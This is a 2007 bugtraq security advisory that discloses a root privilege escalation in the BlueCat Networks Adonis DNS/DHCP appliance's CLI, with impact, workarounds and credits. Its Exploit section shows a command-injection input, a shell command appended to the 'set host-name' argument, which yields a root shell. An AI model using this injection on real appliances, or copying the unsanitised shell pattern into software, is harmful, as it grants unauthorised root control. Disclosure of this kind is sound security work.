bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: TS-2007-003-0: BlueCat Networks Adonis CLI root privile

TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation

From: anonymous.c7ffa4057a <anonymous.c7ffa4057a_at_nospam>
Date: Thu Aug 16 2007 - 16:50:28 GMT
To: bugtraq@securityfocus.com


Template Security Security Advisory


  BlueCat Networks Adonis CLI root privilege escalation

  Date: 2007-08-16
  Advisory ID: TS-2007-003-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/   Revision: 0

Contents


  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary


  Template Security has discovered a root privilege escalation   vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance   which allows the admin user to gain root privilege from the   Command Line Interface (CLI).

Software Version


  Adonis version 5.0.2.8 was tested.

Details


  The admin account on the Adonis DNS/DHCP appliance provides   access to a CLI that allows an administrator to perform tasks   such as setting the IP address, netmask, system time and system   hostname. By entering a certain command sequence, the   administrator is able to execute a command as root.

Impact


  Access to the admin account is the same as root access on the   appliance.

Exploit


  Here we use the 'set host-name' CLI command to execute a root   shell:

    :adonis>set host-name ;bash
    adonis.katter.org
    root@adonis:~# id
    uid=0(root) gid=0(root) groups=0(root)

  NOTE: There may be other command sequences that accomplish the   same result.

Workarounds


  Only provide admin account access to administrators that also   have root account access on the appliance.

Obtaining Patched Software


  Contact the vendor.

Credits


  forloop discovered this vulnerability while enjoying a Tuborg   Gold. forloop is a member of Template Security.

Revision History


  2007-08-16: Revision 0 released